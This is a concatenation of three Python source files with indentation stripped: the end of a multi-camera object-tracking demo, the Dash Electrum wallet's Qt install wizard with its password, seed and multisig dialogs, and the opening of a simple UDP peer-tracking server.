if len(params.save_detections):
save_json_file(params.save_detections, output_detections, description='Detections')
if len(config['embeddings']['save_path']):
save_embeddings(tracker.scts, **config['embeddings'])
def main():
"""Prepares data for the object tracking demo"""
current_dir = os.path.dirname(os.path.abspath(__file__))
parser = argparse.ArgumentParser(description='Multi camera multi object \
tracking live demo script')
parser.add_argument('-i', type=str, nargs='+', help='Input sources (indexes \
of cameras or paths to video files)', required=True)
parser.add_argument('--config', type=str, default=os.path.join(current_dir, 'configs/person.py'), required=False,
help='Configuration file')
parser.add_argument('--detections', type=str, help='JSON file with bounding boxes')
parser.add_argument('-m', '--m_detector', type=str, required=False,
help='Path to the object detection model')
parser.add_argument('--t_detector', type=float, default=0.6,
help='Threshold for the object detection model')
parser.add_argument('--m_segmentation', type=str, required=False,
help='Path to the object instance segmentation model')
parser.add_argument('--t_segmentation', type=float, default=0.6,
help='Threshold for object instance segmentation model')
parser.add_argument('--m_reid', type=str, required=True,
help='Path to the object re-identification model')
parser.add_argument('--output_video', type=str, default='', required=False,
help='Optional. Path to output video')
parser.add_argument('--history_file', type=str, default='', required=False,
help='Optional. Path to file in JSON format to save results of the demo')
parser.add_argument('--save_detections', type=str, default='', required=False,
help='Optional. Path to file in JSON format to save bounding boxes')
parser.add_argument("--no_show", help="Optional. Don't show output", action='store_true')
parser.add_argument('-d', '--device', type=str, default='CPU')
parser.add_argument('-l', '--cpu_extension',
help='MKLDNN (CPU)-targeted custom layers. Absolute \
path to a shared library with the kernels impl.',
type=str, default=None)
parser.add_argument('-u', '--utilization_monitors', default='', type=str,
help='Optional. List of monitors to show initially.')
args = parser.parse_args()
if check_detectors(args) != 1:
sys.exit(1)
if len(args.config):
log.info('Reading configuration file {}'.format(args.config))
config = read_py_config(args.config)
else:
log.error('No configuration file specified. Please specify parameter \'--config\'')
sys.exit(1)
random.seed(config['random_seed'])
capture = MulticamCapture(args.i)
log.info("Creating Inference Engine")
ie = IECore()
if args.detections:
object_detector = DetectionsFromFileReader(args.detections, args.t_detector)
elif args.m_segmentation:
object_detector = MaskRCNN(ie, args.m_segmentation,
config['obj_segm']['trg_classes'],
args.t_segmentation,
args.device, args.cpu_extension,
capture.get_num_sources())
else:
object_detector = Detector(ie, args.m_detector,
config['obj_det']['trg_classes'],
args.t_detector,
args.device, args.cpu_extension,
capture.get_num_sources())
if args.m_reid:
object_recognizer = VectorCNN(ie, args.m_reid, args.device, args.cpu_extension)
else:
object_recognizer = None
run(args, config, capture, object_detector, object_recognizer)
log.info('Demo finished successfully')
if __name__ == '__main__':
main()
|
installwizard.py
|
# Copyright (C) 2018 The Electrum developers
# Distributed under the MIT software license, see the accompanying
# file LICENCE or http://www.opensource.org/licenses/mit-license.php
import os
import json
import sys
import threading
import traceback
from typing import Tuple, List, Callable, NamedTuple, Optional, TYPE_CHECKING
from functools import partial
from PyQt5.QtCore import QRect, QEventLoop, Qt, pyqtSignal
from PyQt5.QtGui import QPalette, QPen, QPainter, QPixmap
from PyQt5.QtWidgets import (QWidget, QDialog, QLabel, QHBoxLayout, QMessageBox,
QVBoxLayout, QLineEdit, QFileDialog, QPushButton,
QGridLayout, QSlider, QScrollArea, QApplication,
QComboBox)
from electrum_dash.wallet import Wallet, Abstract_Wallet
from electrum_dash.storage import WalletStorage, StorageReadWriteError
from electrum_dash.util import UserCancelled, InvalidPassword, WalletFileException, get_new_wallet_name
from electrum_dash.base_wizard import (BaseWizard, HWD_SETUP_DECRYPT_WALLET,
GoBack, ReRunDialog, SaveAndExit)
from electrum_dash.network import Network
from electrum_dash.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import (MessageBoxMixin, Buttons, icon_path, ChoicesLayout, WWLabel,
InfoButton, char_width_in_lineedit, PasswordLineEdit)
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
from .bip39_recovery_dialog import Bip39RecoveryDialog
from electrum_dash.plugin import run_hook, Plugins
if TYPE_CHECKING:
from electrum_dash.simple_config import SimpleConfig
from electrum_dash.wallet_db import WalletDB
from . import ElectrumGui
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in Dash Electrum, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:XERBBcaPf5D5... \t-> XhGqfhnL...\n')
# note: full key is XERBBcaPf5D5oFXTEP7TdPWLem5ktc2Zr3AhhQhHVQaF49fDP6tN
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
+ _("You have multiple consecutive whitespaces or leading/trailing "
"whitespaces in your passphrase.") + " " \
+ _("This is discouraged.") + " " \
+ _("Due to a bug, old versions of Dash Electrum will NOT be creating the "
"same wallet as newer versions or other software.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(4, 4, self.size-8, self.size-8)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 8, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0] # type: InstallWizard
while True:
#wizard.logger.debug(f"dialog stack. len: {len(wizard._stack)}. stack: {wizard._stack}")
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
wizard.save_button.hide()
# current dialog
try:
out = func(*args, **kwargs)
if type(out) is not tuple:
out = (out,)
except GoBack:
if not wizard.can_go_back():
wizard.close()
raise UserCancelled
else:
# to go back from the current dialog, we just let the caller unroll the stack:
raise
except SaveAndExit:
out = tuple()
run_next = wizard.create_wallet
# next dialog
try:
while True:
try:
run_next(*out)
except ReRunDialog:
# restore state, and then let the loop re-run next
wizard.go_back(rerun_previous=False)
else:
break
except GoBack as e:
# to go back from the next dialog, we ask the wizard to restore state
wizard.go_back(rerun_previous=False)
# and we re-run the current dialog
if wizard.can_go_back():
# also rerun any calculations that might have populated the inputs to the current dialog,
# by going back to just after the *previous* dialog finished
raise ReRunDialog() from e
else:
continue
else:
break
return func_wrapper
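# Sketch of how wizard_dialog is applied (the method name and run_next target
# below are hypothetical, shown only to illustrate the decorator's calling
# convention of a keyword 'run_next' callback):
#
#     @wizard_dialog
#     def some_dialog(self, message, run_next):
#         # build the page, block on self.loop, return the user's choice(s)
#         ...
#
#     # a caller supplies run_next, which receives the dialog's return value(s)
#     wizard.some_dialog(message=_('...'), run_next=wizard.on_choice)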
class WalletAlreadyOpenInMemory(Exception):
def __init__(self, wallet: Abstract_Wallet):
super().__init__()
self.wallet = wallet
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
def __init__(self, config: 'SimpleConfig', app: QApplication, plugins: 'Plugins', *, gui_object: 'ElectrumGui'):
QDialog.__init__(self, None)
BaseWizard.__init__(self, config, plugins)
self.setWindowTitle('Dash Electrum - ' + _('Install Wizard'))
self.app = app
self.config = config
self.gui_thread = gui_object.gui_thread
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.save_button = QPushButton(_('Save and exit'), self)
self.save_button.hide()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
self.save_button.clicked.connect(lambda: self.loop.exit(3))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
btns_hbox = QHBoxLayout()
btns_hbox.addWidget(self.save_button)
btns_hbox.addStretch(1)
btns_hbox.addLayout(Buttons(self.back_button, self.next_button))
outer_vbox.addLayout(btns_hbox)
self.set_icon('electrum-dash.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def select_storage(self, path, get_wallet_from_daemon) -> Tuple[str, Optional[WalletStorage]]:
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
name_e = QLineEdit()
hbox.addWidget(name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
msg_label = WWLabel('')
vbox.addWidget(msg_label)
hbox2 = QHBoxLayout()
pw_e = PasswordLineEdit('', self)
pw_e.setFixedWidth(17 * char_width_in_lineedit())
pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(pw_label)
hbox2.addWidget(pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
vbox.addSpacing(50)
vbox_create_new = QVBoxLayout()
vbox_create_new.addWidget(QLabel(_('Alternatively') + ':'), alignment=Qt.AlignLeft)
button_create_new = QPushButton(_('Create New Wallet'))
button_create_new.setMinimumWidth(120)
vbox_create_new.addWidget(button_create_new, alignment=Qt.AlignLeft)
widget_create_new = QWidget()
widget_create_new.setLayout(vbox_create_new)
vbox_create_new.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(widget_create_new)
self.set_layout(vbox, title=_('Dash Electrum wallet'))
temp_storage = None # type: Optional[WalletStorage]
wallet_folder = os.path.dirname(path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
name_e.setText(path)
def on_filename(filename):
# FIXME? "filename" might contain ".." (etc) and hence sketchy path traversals are possible
nonlocal temp_storage
temp_storage = None
msg = None
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
temp_storage = wallet_from_memory.storage # type: Optional[WalletStorage]
else:
temp_storage = WalletStorage(path)
except (StorageReadWriteError, WalletFileException) as e:
msg = _('Cannot read file') + f'\n{repr(e)}'
except Exception as e:
self.logger.exception('')
msg = _('Cannot read file') + f'\n{repr(e)}'
self.next_button.setEnabled(temp_storage is not None)
user_needs_to_enter_password = False
if temp_storage:
if not temp_storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
elif not wallet_from_memory:
if temp_storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
user_needs_to_enter_password = True
elif temp_storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
else:
msg = _("Press 'Next' to open this wallet.")
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
if msg is None:
msg = _('Cannot read file')
msg_label.setText(msg)
widget_create_new.setVisible(bool(temp_storage and temp_storage.file_exists()))
if user_needs_to_enter_password:
pw_label.show()
pw_e.show()
pw_e.setFocus()
else:
pw_label.hide()
pw_e.hide()
button.clicked.connect(on_choose)
button_create_new.clicked.connect(
partial(
name_e.setText,
get_new_wallet_name(wallet_folder)))
name_e.textChanged.connect(on_filename)
name_e.setText(os.path.basename(path))
def run_user_interaction_loop():
while True:
if self.loop.exec_() != 2: # 2 = next
raise UserCancelled()
assert temp_storage
if temp_storage.file_exists() and not temp_storage.is_encrypted():
break
if not temp_storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(temp_storage.path)
if wallet_from_memory:
raise WalletAlreadyOpenInMemory(wallet_from_memory)
if temp_storage.file_exists() and temp_storage.is_encrypted():
if temp_storage.is_encrypted_with_user_pw():
password = pw_e.text()
try:
temp_storage.decrypt(password)
break
except InvalidPassword as e:
self.show_message(title=_('Error'), msg=str(e))
continue
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=repr(e))
raise UserCancelled()
elif temp_storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET, storage=temp_storage)
except InvalidPassword as e:
self.show_message(title=_('Error'),
msg=_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.reset_stack()
return self.select_storage(path, get_wallet_from_daemon)
except (UserCancelled, GoBack):
raise
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=repr(e))
raise UserCancelled()
if temp_storage.is_past_initial_decryption():
break
else:
raise UserCancelled()
else:
raise Exception('Unexpected encryption version')
try:
run_user_interaction_loop()
finally:
try:
pw_e.clear()
except RuntimeError: # wrapped C/C++ object has been deleted.
pass # happens when decrypting with hw device
return temp_storage.path, (temp_storage if temp_storage.file_exists() else None)
def run_upgrades(self, storage: WalletStorage, db: 'WalletDB') -> None:
path = storage.path
if db.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Dash Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = db.split_accounts(path)
msg = _('Your accounts have been moved to') + ':\n' + '\n'.join(file_list) + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
# raise now, to avoid having the old storage opened
raise UserCancelled()
action = db.get_action()
if action and db.requires_upgrade():
raise WalletFileException('Incomplete wallet files cannot be upgraded.')
if action:
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
self.data = json.loads(storage.read())
self.run(action)
for k, v in self.data.items():
db.put(k, v)
db.write(storage)
return
if db.requires_upgrade():
self.upgrade_db(storage, db)
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
self.logger.error("on_error", exc_info=exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(icon_path(filename))
.scaledToWidth(60, mode=Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled()
if result == 1:
raise GoBack from None
if result == 3:
raise SaveAndExit from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
header_layout = QHBoxLayout()
label = WWLabel(message)
label.setMinimumWidth(400)
header_layout.addWidget(label)
if show_wif_help:
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, seed, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(msg=msg, kind=kind, OK_button=self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
try:
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
finally:
playout.clear_password_fields()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def continue_multisig_setup_dialog(self, m, n, keystores, run_next):
msg = ' '.join([
_("This wallet is an unfinished multisig wallet"
" with {} cosigners and {} required signatures.").format(n, m),
_("Press 'Next' to finish creation of the wallet.")
])
vbox = QVBoxLayout()
msg_label = WWLabel(msg)
vbox.addWidget(msg_label)
cosigners_combobox = QComboBox(self)
xpub_label = WWLabel('')
xpub_layout = SeedLayout('xpub', icon=False, for_seed_words=False)
def on_cosigner_changed(i):
xpub = keystores[i].xpub
xpub_layout.seed_e.setText(xpub)
if i == 0:
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
else:
msg = _("Here is your cosigner {} public key.").format(i+1)
xpub_label.setText(msg)
cosigners_combobox.currentIndexChanged.connect(on_cosigner_changed)
mpk_ks = keystores[0]
mpk_item = _('Master Public Key')
if hasattr(mpk_ks, 'label'):
mpk_item += f': {mpk_ks.get_type_text()} {mpk_ks.label}'
cosigners_combobox.addItem(mpk_item)
for i in range(len(keystores)):
if i > 0:
ks = keystores[i]
cs_item = _('Cosigner {}').format(i+1)
if hasattr(ks, 'label'):
cs_item += f': {ks.get_type_text()} {ks.label}'
cosigners_combobox.addItem(cs_item)
vbox.addWidget(cosigners_combobox)
vbox.addWidget(xpub_label)
vbox.addLayout(xpub_layout.layout())
self.exec_layout(vbox, _('Continue multisig wallet setup'))
return tuple()
@wizard_dialog
def unfinished_confirm_password(self, run_next):
vbox = QVBoxLayout()
msg_label = WWLabel(_('Please enter the wallet password before continuing'))
vbox.addWidget(msg_label)
hbox = QHBoxLayout()
pw_e = PasswordLineEdit('', self)
pw_e.setFixedWidth(17 * char_width_in_lineedit())
pw_label = QLabel(_('Password') + ':')
hbox.addWidget(pw_label)
hbox.addWidget(pw_e)
hbox.addStretch()
vbox.addLayout(hbox)
self.set_layout(vbox, title=_('Confirm wallet password'))
try:
while True:
pw_e.setFocus()
if self.loop.exec_() != 2: # 2 = next
raise UserCancelled()
password = pw_e.text()
try:
self.unfinished_check_password(password)
break
except InvalidPassword as e:
self.show_message(title=_('Error'), msg=str(e))
continue
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=repr(e))
raise UserCancelled()
finally:
pw_e.clear()
return password
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(MSG_HW_STORAGE_ENCRYPTION)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self, **kwargs):
self.accept_signal.emit()
def waiting_dialog(self, task, msg, on_finished=None):
label = WWLabel(msg)
vbox = QVBoxLayout()
vbox.addSpacing(100)
label.setMinimumWidth(300)
label.setAlignment(Qt.AlignCenter)
vbox.addWidget(label)
self.set_layout(vbox, next_enabled=False)
self.back_button.setEnabled(False)
t = threading.Thread(target=task)
t.start()
while True:
t.join(1.0/60)
if t.is_alive():
self.refresh_gui()
else:
break
if on_finished:
on_finished()
def run_task_without_blocking_gui(self, task, *, msg=None):
assert self.gui_thread == threading.current_thread(), 'must be called from GUI thread'
if msg is None:
msg = _("Please wait...")
exc = None # type: Optional[Exception]
res = None
def task_wrapper():
nonlocal exc
nonlocal res
try:
res = task()
except Exception as e:
exc = e
self.waiting_dialog(task_wrapper, msg=msg)
if exc is None:
return res
else:
raise exc
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next, can_save=False):
if can_save:
self.save_button.show()
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def derivation_and_script_type_gui_specific_dialog(
self,
*,
title: str,
message1: str,
choices: List[Tuple[str, str, str]],
hide_choices: bool = False,
message2: str,
test_text: Callable[[str], int],
run_next,
default_choice_idx: int = 0,
get_account_xpub=None,
) -> Tuple[str, str]:
vbox = QVBoxLayout()
if get_account_xpub:
button = QPushButton(_("Detect Existing Accounts"))
def on_account_select(account):
script_type = account["script_type"]
if script_type == "p2pkh":
script_type = "standard"
button_index = c_values.index(script_type)
button = clayout.group.buttons()[button_index]
button.setChecked(True)
line.setText(account["derivation_path"])
button.clicked.connect(lambda: Bip39RecoveryDialog(self, get_account_xpub, on_account_select))
vbox.addWidget(button, alignment=Qt.AlignLeft)
vbox.addWidget(QLabel(_("Or")))
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
c_default_text = [x[2] for x in choices]
def on_choice_click(clayout):
idx = clayout.selected_index()
line.setText(c_default_text[idx])
clayout = ChoicesLayout(message1, c_titles, on_choice_click,
checked_index=default_choice_idx)
if not hide_choices:
vbox.addLayout(clayout.layout())
vbox.addWidget(WWLabel(message2))
line = QLineEdit()
def on_text_change(text):
self.next_button.setEnabled(test_text(text))
line.textEdited.connect(on_text_change)
on_choice_click(clayout) # set default text for "line"
vbox.addWidget(line)
self.exec_layout(vbox, title)
choice = c_values[clayout.selected_index()]
return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=(), warn_issue4566=False):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
if warn_issue4566:
text_whitespace_normalised = ' '.join(text.split())
warn_issue4566_label.setVisible(text != text_whitespace_normalised)
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
warn_issue4566_label.setVisible(False)
vbox.addWidget(warn_issue4566_label)
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMinimumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, alignment=Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return line.text()
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next, hw_info=None):
self.save_button.show()
title = (_('Hardware Wallet Public Key') if hw_info else
_('Master Public Key'))
msg = ' '.join([
_("Here is your {} public key.").format(hw_info) if hw_info else
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, title)
return None
def init_network(self, network: 'Network'):
message = _("Dash Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose, differing only in "
"hardware. In most cases you simply want to let Dash Electrum "
"pick one at random. However, if you prefer, feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server?")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
self.config.set_key('auto_connect', network.auto_connect, True)
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
backup_warning_label.setVisible(cw.m != cw.n)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
backup_warning_label.setVisible(cw.m != cw.n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
vbox.addSpacing(2 * char_width_in_lineedit())
backup_warning_label = WWLabel(_("Warning: to be able to restore a multisig wallet, "
"you should include the master public key for each cosigner "
"in all of your backups."))
vbox.addWidget(backup_warning_label)
on_n(2)
on_m(2)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
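# A minimal sketch (not part of the original wizard code) documenting the dialog-loop
# return codes used throughout this class: self.loop.exec_() yields 2 when the user
# presses "Next", 1 for "Back" (raises GoBack), 3 for "Save and exit" (raises
# SaveAndExit), and a falsy value for cancel (raises UserCancelled when
# raise_on_cancel is True). The constant names below are illustrative only.
WIZARD_LOOP_RESULT_CANCEL = 0  # -> UserCancelled (when raise_on_cancel=True)
WIZARD_LOOP_RESULT_BACK = 1    # -> GoBack
WIZARD_LOOP_RESULT_NEXT = 2    # checked explicitly, e.g. `if self.loop.exec_() != 2`
WIZARD_LOOP_RESULT_SAVE = 3    # -> SaveAndExit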
|
server.py
|
import time
import copy
import json
import socket
import threading
# running locally
from message import Message
class Servidor:
HOST = "127.0.0.1"
PORT = 10098
ALIVE_PORT = PORT + 1
SERVER = (HOST, PORT)
BUFFERSIZE = 1024
BROAD_CAST_TIME_INTERVAL = 30 # Time between each request sent to the peers (seconds)
ALIVE_TIMEOUT = 3 # Time to wait for the peer's reply to the ALIVE request (seconds)
def __init__(self):
# Used to communicate with the peer: JOIN, SEARCH, LEAVE and UPDATE requests
self.UDPServerSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.UDPServerSocket.bind((self.HOST, self.PORT))
# Used specifically for ALIVE request communication
self.UDPAliveSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.UDPAliveSocket.bind((self.HOST, self.ALIVE_PORT))
self.peers = {} # Data structure that stores the peers
def _receive(self):
"""
Listens for UDP requests from the peers. Creates a thread for each request.
"""
while True:
try:
data, peer_udp = self.UDPServerSocket.recvfrom(self.BUFFERSIZE)
